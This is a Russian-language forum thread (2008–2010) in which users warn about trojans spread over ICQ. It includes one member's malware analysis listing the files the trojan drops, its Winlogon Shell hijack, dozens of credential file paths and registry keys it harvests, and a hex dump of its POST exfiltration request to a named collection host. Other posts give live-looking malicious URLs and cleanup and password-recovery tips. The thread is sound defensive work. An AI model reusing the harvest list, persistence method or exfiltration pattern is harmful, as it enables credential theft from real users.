PDA

Просмотр полной версии : Новый ICQ троян


NoName®
16.11.2008, 12:10
Вобщем если в двух чертах , то

Знакомые контакты присылают вам сообщение типа

h**p://absoluts.org/img/live.gif

Картинкой по этой ссылке не пахнет вовсе ссылка возвращает html редирект - браузер отображает сразу две урлы - одна http://absoluts.org/img/2410232.jpg - в этой нет ничего ужасного )

Вторая h**p://linenetz.com/stats/ru1.php что отдаёт данный PHP пока не знаю , вроде следующий редирект но ничем хорошим это не пахнет.

Всем удачи , и будте внимательны чтоб не писать в топике про угон асек )

Собственно сама картинка )
http://absoluts.org/img/2410232.jpg

alfv
16.11.2008, 14:11
Ага , картинку эту видел . Но аська еще со мной :)

bond95
16.11.2008, 15:13
Есть такое дело ..Еще одна ссылка присутствует ..даже не одна

tolik07 (28.10.08 7:45) :
привет
h**p://fettz.net/54489/
посмотри, классная вещь! :)

tolik07 (3:02) : (а это сегодня утром )
привет
h**p://absoluts.org/00700/
посмотри, классная вещь! :)

Но так как к подобным фокусам уже выработанное отношение то естественно не открываю никогда ..

FA_
16.11.2008, 15:40
Добавлю: в день получаю таких ссылок 2-3, при чем хозяева асек знают об этом, и никакая смена пороля и т.п. не помогает... (или говорят что не помогает).

Recar
16.11.2008, 16:39
Добавлю: в день получаю таких ссылок 2-3, при чем хозяева асек знают об этом, и никакая смена пороля и т.п. не помогает... (или говорят что не помогает).

Так если у них на компе сидит вирус, то хоть заменяйся пароль, всёравно при запуске аськи начнёт рассылать, от пароля не зависит, ведь он сам его и вводит. Причём антивирусы зачастую не всегда видят эту вредоносную програмку.

картинка напомнила фильм "звонок".

FA_
16.11.2008, 19:18
Так если у них на компе сидит вирус, то хоть заменяйся пароль, всёравно при запуске аськи начнёт рассылать, от пароля не зависит, ведь он сам его и вводит. Причём антивирусы зачастую не всегда видят эту вредоносную програмку.

картинка напомнила фильм "звонок".

Самый злостный спамер заходит в аську только с мобилки, а когда он оффлайн - пару раз в сути вижу от него такую вот срань...
_______________________________

alfv, картинка всё та же...

alfv
16.11.2008, 20:09
У меня между прочим тоже пришло от человека , который сидит в аське только с мобилки .
Может это новый вирь для смартфонов ?
ps А картинго какаято зомбирующая :)

Morfeus
23.09.2009, 14:53
Внимание очередной троян, антивирусными программами пока не определяется, рассылается по ICQ, от пользователей включённых в список контактов и соответственно при заражении таким же образом рассылается, вот в таком виде:

никого не узнаёшь на этой фотке? гг))
http://**-**.com/img/foto35.gif

и через нескольком минут следующее:

заметно что фотка в фотошопе отредактирована или нет?
http://**-**.com/img/foto35.gif

При попытке пройти по ссылке, срабатывает менеджер загрузки и по редиректу предлагает сохранить вот такой файл: foto35.scr - программа-заставка.
Вот скрин с результами проверки на сайте Virus Total. Определяют эту дрянь пока всего 4 антивируса, инфа на скрине, образец заразы отправлен в службу Касперского. DrWeb определяет эту гадость вот так: DrWeb 5.0.0.12182 2009.09.23 Trojan.Winlock.252
Так что будьте БДИТЕЛЬНЫ!

Здесь был вложен файл: screen.jpg (80.2 Кб), но к сожалению был утерян. Если он у Вас есть, свяжитесь с администрацией для его восстановления. Спасибо.

Фортэс
23.09.2009, 22:07
Попросил у MorfeusJohn'a этого трояна для исследований. Вот что удалось узнать:

При запуске создаются файлы:
c:\windows\explorerr.exe - ворует пароли
c:\windows\svcoost.exe - блокирует систему
для отвода глаз показывается фотка, спрятанная в ресурсах.

Меняется ключ реестра
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
значение параметра Shell меняется с "explorer.exe" на "c:\windows\svcoost.exe"

файл foto35.scr удаляется с помощью временного файла 154.bat (который потом удаляет сам себя)

Читаются файлы, содержащие пароли браузеров и т.д.
C:\WINDOWS\WCX_FTP.INI - настройки ftp-серверов из TotalCommander
C:\DOCUMENTS AND SETTINGS\"ИМЯ_АКТИВНОГО_ПОЛЬЗОВАТЕЛЯ"\APPLICATION DATA\OPERA\OPERA\PROFILE\WAND.DAT - пароли оперы
C:\DOCUMENTS AND SETTINGS\"ИМЯ_АКТИВНОГО_ПОЛЬЗОВАТЕЛЯ"\APPLICATION DATA\OPERA\OPERA\MAIL\ACCOUNTS.INI - почта из оперы
C:\DOCUMENTS AND SETTINGS\"ИМЯ_АКТИВНОГО_ПОЛЬЗОВАТЕЛЯ"\APPLICATION DATA\THUNDERBIRD\PROFILES.INI - почта MozillaThunderbird

Все найденный пароли отправляются по http на адрес http://v1902.vps.masterhost.ru/


Для тех кто запускал этот вирус
Лечение очень простое - загрузиться с любого Live-CD, подключить реестр заражённого компьютера и изменить в ключе
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
значение параметра Shell на "explorer.exe"

Ну и не забудьте поменять свои пароли :wink:

vitpod
24.09.2009, 08:39
Также создается файл ForLOOsers.txt - в нем содержится следующая информация:

1050695522
pn2n16

возможно это пароль для разблокировки системы, проверить я не удосужился.

в моём случае, еще и права пользователя заблокировались + пропала панель задач.
для её включения необходимо создать нового пользователя и добавить в реестр следующую информацию:
см. файл

затем перезагрузить компьютер.

Затем чтобы включить CTRL+ALT+DEL правим реестр
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System] DisableTaskMgr на значение 0.

Здесь был вложен файл: task.zip (344 байт), но к сожалению был утерян. Если он у Вас есть, свяжитесь с администрацией для его восстановления. Спасибо.

IgorYas
24.09.2009, 13:36
необходимо создать нового пользователя и добавить в реестр следующую информацию:
см. файл

затем перезагрузить компьютер.

Затем чтобы включить CTRL+ALT+DEL правим реестр
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System] DisableTaskMgr на значение 0.
Тоже самое можно сделать не создавая новую учетную запись, а загрузившись с LIVE-CD.
Попутно разрешить правку реестра и подправить Shell.
Впрочем, кому как удобнее...

Mad Dog
24.09.2009, 13:48
.:: Скрытый текст (вы должны зарегистрироваться или войти под своим логином) ::.

Собственно, предлагаю доковырять трояна и прикрыть навсегда. ))

Фортэс
25.09.2009, 00:15
Mad Dog, вот дополнительные данные для абузы.

все пароли шлются через сокет на адрес http://www.ch-mz.ru/images/catalog/icon/fg54h.php.

Вот конкретно текст отправки через Send после чтения всех паролей

00A40020 50 4F 53 54 20 2F 69 6D 61 67 65 73 2F 63 61 74 POST /images/cat
00A40030 61 6C 6F 67 2F 69 63 6F 6E 2F 66 67 35 34 68 2E alog/icon/fg54h.
00A40040 70 68 70 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F php HTTP/1.0..Ho
00A40050 73 74 3A 20 77 77 77 2E 63 68 2D 6D 7A 2E 72 75 st: www.ch-mz.ru
00A40060 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 ..Content-Type:
00A40070 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 application/x-ww
00A40080 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 w-form-urlencode
00A40090 64 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B d..Connection: K
00A400A0 65 65 70 2D 41 6C 69 76 65 0D 0A 50 72 61 67 6D eep-Alive..Pragm
00A400B0 61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 55 73 65 a: no-cache..Use
00A400C0 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 r-Agent: Mozilla
00A400D0 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 /4.0 (compatible
00A400E0 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 ; MSIE 6.0; Wind
00A400F0 6F 77 73 20 4E 54 20 35 2E 31 3B 20 53 56 31 3B ows NT 5.1; SV1;
00A40100 20 49 6E 66 6F 50 61 74 68 2E 32 3B 20 2E 4E 45 InfoPath.2; .NE
00A40110 54 20 43 4C 52 20 32 2E 30 2E 35 30 37 32 37 3B T CLR 2.0.50727;
00A40120 20 49 6E 66 6F 50 61 74 68 2E 31 29 0D 0A 43 6F InfoPath.1)..Co
00A40130 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 33 35 ntent-Length: 35
00A40140 35 36 0D 0A 0D 0A 61 3D 26 62 3D 67 74 26 64 3D 56....a=&b=gt&d=
00A40150 72 74 26 63 3D 00 00 00 00 00 00 00 00 00 00 00 rt&c=...........

сами данные с паролями я вырезал.


Traceroute
Tracing route to www.ch-mz.ru [87.242.98.91]...

hop rtt rtt rtt ip address fully qualified domain name
1 4 0 1 70.84.211.97 61.d3.5446.static.theplanet.com
2 0 0 0 70.87.254.5 po101.dsr02.dllstx5.theplanet.com
3 0 0 0 70.85.127.109 po52.dsr02.dllstx3.theplanet.com
4 0 0 0 70.87.253.21 et3-1.ibr03.dllstx3.theplanet.com
5 32 32 32 70.87.253.190 be.fd.5746.static.theplanet.com
6 32 51 32 206.223.115.96 equinix.ashb.retn.net
7 143 142 142 87.245.233.205 xe120-2.rt.tc1.sto.se.retn.net
8 193 167 167 90.156.216.32 max2.pvc.masterhost.ru
9 167 191 168 87.242.98.91 v1902.vps.masterhost.ru

Trace complete


Думаю этого будет для них достаточно :kos:




сайт http://www.ch-mz.ru зарегистрирован у хостера www.masterhost.ru . Можно проверить через этот сервис (http://centralops.net/co/DomainDossier.aspx?addr=http%3a%2f%2fwww.ch-mz.ru&dom_whois=true&dom_dns=true&net_whois=true)


Address lookup
canonical name ch-mz.ru.
aliases www.ch-mz.ru

addresses 87.242.98.91


Domain Whois record
Queried whois.ripn.net with "ch-mz.ru"...

% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

ВЛАДЕЛЕЦ САЙТА
domain: CH-MZ.RU
type: CORPORATE
nserver: ns1.budagovsky.ru.
nserver: ns2.budagovsky.ru.
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 9021 762483
e-mail: [email protected]
registrar: REGTIME-REG-RIPN
created: 2007.12.19
paid-till: 2009.12.19
source: TC-RIPN


Last updated on 2009.09.25 00:02:05 MSK/MSD


Network Whois record
Queried whois.ripe.net with "-B 87.242.98.91"...

% Information related to '87.242.98.0 - 87.242.99.255'

inetnum: 87.242.98.0 - 87.242.99.255
netname: MASTERHOST-VPS-2
descr: MasterHost VPS services
country: RU
admin-c: MHST-RIPE
tech-c: MHST-RIPE
status: ASSIGNED PA
notify: [email protected]
mnt-by: MASTERHOST-MNT
changed: [email protected] 20060502
source: RIPE

role: MASTERHOST NOC
address: .masterhost
address: Lyalin lane 3, bld 3
address: 105062 Moscow
address: Russia
phone: +7 495 7729720
fax-no: +7 495 7729723
e-mail: [email protected]
remarks: ----------------------------------------------------------
remarks: MASTERHOST is available 24 x 7
remarks: ----------------------------------------------------------
remarks: Points of contact for MASTERHOST Network Operations
remarks: ----------------------------------------------------------
remarks: Routing and peering issues: [email protected]
remarks: SPAM and Network security issues: [email protected]
remarks: Mail and News issues: [email protected]
remarks: Customer support: [email protected]
remarks: General information: [email protected]
remarks: ----------------------------------------------------------
admin-c: AAS-RIPE
tech-c: AAS-RIPE
tech-c: UNK-RIPE
nic-hdl: MHST-RIPE
notify: [email protected]
abuse-mailbox: [email protected]
mnt-by: MASTERHOST-MNT
changed: [email protected] 20050714
changed: [email protected] 20050802
changed: [email protected] 20070410
source: RIPE

% Information related to '87.242.64.0/18AS25532'

route: 87.242.64.0/18
descr: .masterhost
origin: AS25532
notify: [email protected]
mnt-by: MASTERHOST-MNT
changed: [email protected] 20050729
source: RIPE

DNS records
name class type data time to live
www.ch-mz.ru IN CNAME ch-mz.ru 86127s (23:55:27)
ch-mz.ru IN MX preference: 10
exchange: mail.ch-mz.ru
86400s (1.00:00:00)
ch-mz.ru IN SOA server: ns2.budagovsky.ru
email: ars.budagovsky.ru
serial: 0
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 10800
86400s (1.00:00:00)
ch-mz.ru IN NS ns2.budagovsky.ru 86400s (1.00:00:00)
ch-mz.ru IN NS ns1.budagovsky.ru 86400s (1.00:00:00)
ch-mz.ru IN A 87.242.98.91 86400s (1.00:00:00)
91.98.242.87.in-addr.arpa IN PTR v1902.vps.masterhost.ru 628s (00:10:28)





В первый раз я не совсем точно посмотрел что именно воруется из системы. Вот примерный список.

файлы:

C:\WINDOWS\WCX_FTP.INI
C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\PROFILE\WAND.DAT
C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\MAIL\ACCOUNTS.INI
C:\Documents and Settings\Пользователь\Application Data\THUNDERBIRD\PROFILES.INI
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\.gaim\accounts.xml
C:\Documents and Settings\Пользователь\Application Data\FileZilla\sitemanager.xml
C:\WINDOWS\VD3User.dat
C:\WINDOWS\Vd3main.dat
C:\Program Files\FTP Commander\Ftplist.txt
C:\Program Files\FTP Commander Pro\Ftplist.txt
C:\Program Files\FTP Commander Deluxe\Ftplist.txt
C:\Program Files\Total Commander\Profiles\Prof\ftp.ini
C:\WINDOWS\edialer.ini
C:\Program Files\Trillian\User Settings\*.*


ключи реестра
SOFTWARE\RIT\The Bat!
SOFTWARE\Mirabilis\ICQ\DefaultPrefs
SOFTWARE\Mirabilis\ICQ\NewOwners
Software\Ghisler\Windows Commander
Software\Ghisler\Total Commander
Software\RimArts\B2\Settings
Software\Microsoft\Internet Account Manager\Accounts
SOFTWARE\Far\Plugins\FTP\Hosts
Software\Mail.Ru\Agent\mra_logins
Software\CoffeeCup Software\Internet\Profiles




Всем удачи :wink: берегите свои данные

Mad Dog
25.09.2009, 12:58
.:: Скрытый текст (вы должны зарегистрироваться или войти под своим логином) ::.

Вот собственно и добились желаемого результата. Надеюсь трояна прикроют. :poz:

mazepa
28.09.2009, 01:14
МХ странный хостер. его иногда арбузы не прошибают, а иногда и помидора хватает. не факт, что прикроют.

Жень, данные адреса своего исправь, или забанен будешь )

NoName®
19.10.2009, 14:24
Внимание!
Буквально сегодня через ICQ и обменник file.qip.ru стал распространятся достаточно интересный вирус, интересен хотя бы тем, что он умеет говорить :)
От многих знакомых по аське приходит ссылка

начинается таким текстом:

Ссылка для скачивания файла Egg.rar
h++p://file.qip.ru/file/104450980/99aeff39/Egg.html (950 кб)
[-- Файл отправлен через file.qip.ru. Подробнее на сайте: http://file.qip.ru/ --]
dkuk (12:13:33 19/10/2009)
че?

XYZ (12:13:42 19/10/2009)
нечто позитивное )

dkuk (12:13:47 19/10/2009)
вирус?

XYZ (12:13:54 19/10/2009)
нет, ты не в церкви, тебя не обманут ))



Будьте внимательны
НЕ СКАЧИВАЙТЕ И НЕ ОТКРЫЙВАЙТЕ ФАЙЛ . Потеряете аську

Источник : http://habrahabr.ru/blogs/infosecurity/70287/

Morfeus
19.10.2009, 15:04
Подтверждаю, приходило такое сообщение с полчаса назад от нескольких контактов из моего контакт-листа, причём даже с моей старой аси, хотя я её редко использую!

Фортэс
21.10.2009, 16:30
Если у кого-нибудь этот троян остался - вышлите мне в ЛС

тут уже все написано :)
мне интересно что именно вирус делает, а не как восстановить пароль аськи :)

Habib
21.10.2009, 16:46
http://www.mobile-files.ru/forum/showthread.php?t=232206 тут уже все написано :)

Recar
18.01.2010, 21:55
Внимание Свиной грипп в ICQ!!!!!

Сейчас многим в аську от людей из контакт-листа (читай друзей, знакомых) приходит сообщение следующего содержания:

*** (17:37:09 18/01/2010)
Прямая ссылка для скачивания файла Piggy.zip
eas***ad.ru/do****ad/? (1,95 мб)
[-- Файл отправлен через сервис EasyLoad. Подробнее на сайте: easyload.ru/ --]

Ни в коем случае не качайте, не ходите по ссылке. Если от кого-то пришло, значит он уже сходил и остался без пароля!

Происходит следующее: вам показывают флэшку со свинюшкой и радуют сообщением, что вы заражены свиным H1N1, тут же аська закрывается с сообщением "Используется на другом компьютере" и всё

И еще: вирусяка умный, может отвечать на Ваши вопросы типа "спам?", "что это?". Отвечает обычно что-то типа "это не спам, это я шлю о_О" и "флешка про свинью ) глянь )))"


Вот еще ссылка на описание вируса http://privatedetective.habrahabr.ru/blog/81126/

Свиной грипп в ICQ
В рунете появился еще один вирус, рассылаемый через ICQ сеть. Называется он, судя по всему, H1N1.

Вирус отличает интеллектуальность — он даже пытается разговаривать с людьми (отвечает на простейшие вопросы).

Два лога и скриншот профиля под катом.

UPD. При открытии файла «свинья» поменяет ваш пароль на ICQ и начнет рассылать себя от вашего имени.
UPD2. Кто-нибудь из тех, кто минусует, поясните, пожалуйста, за что.
UPD3. Если подхватили — спастись просто — восстановление пароля через icq.com срабатывает (если, конечно, uin привязан к e-mail).
UPD4. Ну и плюйтесь себе. Больше предупреждать не буду — кармы на всех не хватит.

Вот лог двух разговоров с разными контактами:

первый:

*** (17:37:09 18/01/2010)
Прямая ссылка для скачивания файла Piggy.zip
easyload.ru/download/?25596 (1,95 мб)
[-- Файл отправлен через сервис EasyLoad. Подробнее на сайте: easyload.ru/ --]

Private Detective (18:14:18 18/01/2010)
спам

*** (18:14:26 18/01/2010)
это не спам, это я шлю о_О

Private Detective (18:14:33 18/01/2010)
что это?

*** (18:14:41 18/01/2010)
флешка про свинью ) глянь )))

— второй:

***(18:10:15 18/01/2010)
Прямая ссылка для скачивания файла Piggy.zip
easyload.ru/download/?25596 (1,95 мб)
[-- Файл отправлен через сервис EasyLoad. Подробнее на сайте: easyload.ru/ --]

Private Detective (18:11:07 18/01/2010)
что это?

*** (18:11:15 18/01/2010)
флешка про свинью ) глянь )))

Private Detective (18:11:30 18/01/2010)
спам же)

Joint (18:11:39 18/01/2010)
это не спам, это я шлю о_О

Private Detective (18:11:57 18/01/2010)
кто я? о_О

— Профиль завирусованного отображается вот так:
http://clip2net.com/clip/m24072/1263827983-clip-6kb.png

nickjust
18.01.2010, 23:45
Вирус piggy.exe N1H1

Восстанавливайте пароль от аськи на свой e-mail ( https://www.icq.com/password/ ). Если в профиле не был указан e-mail, то поделать ничего нельзя: вирус меняет текущий пароль на произвольное 8-значное число.

Вам повезло если у вас аська связана с почтой на рамблере:
если поменять пароль от почты на рамблере, то на аську он станет такой же.


P.S.
Еще есть вариант!
Писать в техсуппорт аськи ,плюс приложить 2-3 письма от знакомых у которых аська более 1 года ...обьяснив ситуацию!

Фортэс
20.01.2010, 00:10
.:: Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 100 сообщение(ий)) ::.

Siecker
20.01.2010, 19:06
Вам повезло если у вас аська связана с почтой на рамблере:
если поменять пароль от почты на рамблере, то на аську он станет такой же.


Это ерунда все, НЕ НУЖНО ПОЛАГАТСЯ НА РАМБЛЕР, на днях на одной из моей шестизначной аське отвязали рамблер МАХОМ!

Реальная защита от угона, это МОЗГИ.
А также ПМ от номера, который не отваливается после ретрива.
Больше защит эффективных не существует.

Estet
20.01.2010, 19:40
Если в профиле не был указан e-mail, то поделать ничего нельзя: вирус меняет текущий пароль на произвольное 8-значное число.
Можно. В информации о контакте появляются двоичные коды, это и есть пароль. У меня коллега таким способом восстановил свой пароль.

nickjust
20.01.2010, 22:28
Вирус изменяет личную информацию о контакте на нолики и единички
это и есть новый пароль на аську в зашифрованом виде
розбиваем по 10 бит.. получаем N групп

0100110010 - 1
0101100000 - 2
0101100010 - 3
0101100100 - 4
0101100110 - 5
0101101000 - 6
0101101010 - 7
0101101100 - 8
0101101110 - 9
0100110000 - 0



Пробуем!

bond95
20.01.2010, 22:36
розбиваем по 10 бит.. получаем 8 групп
Я вижу девять групп ..Или я не оттуда считаю ?:unknw:

Без рекламы ..Контактный лист довольно большой .Использую mail agent комбинированый агент и аська в одном .
За все время сколько было ни одной подобной рассылки ..Что это ? Мне везет ? Или все же есть фильтра которые борются с подобными явлениями в самом агенте ? Да кстати ..Спама как такового фактически нет по сравнению с чистым QIP который использовал раньше ..

Nics
20.01.2010, 23:50
Да кстати ..Спама как такового фактически нет по сравнению с чистым QIP который использовал раньше ..
аналогично, пользую R&Q. Как свалил с qip, сразу ощутил эффект - 1-2 бота в неделю, не более тогда как в квип лезло по 20-30 в день!

nickjust
21.01.2010, 01:33
например бинарный код :

01011001100101101010010011000001011011100101101000 010110011001011001100101100010

делим его на ровные части по 10 символов в каждой, то есть на примере вышеуказанного
0101100110-5, 0101101010-7, 0100110000-0, 0101101110-9, 0101101000-6, 0101100110-5, 0101100110-5, 0101100010-3

после этого совмещаем с предложенной матрицей и получаем искомый пароль для вышеуказанной последовательности этот код будет: 57096553
Мне кажется что количество знаков пароля - равно длине номера аськи
Например для 6 знака - пароль будет 6 цифр! ИМХО!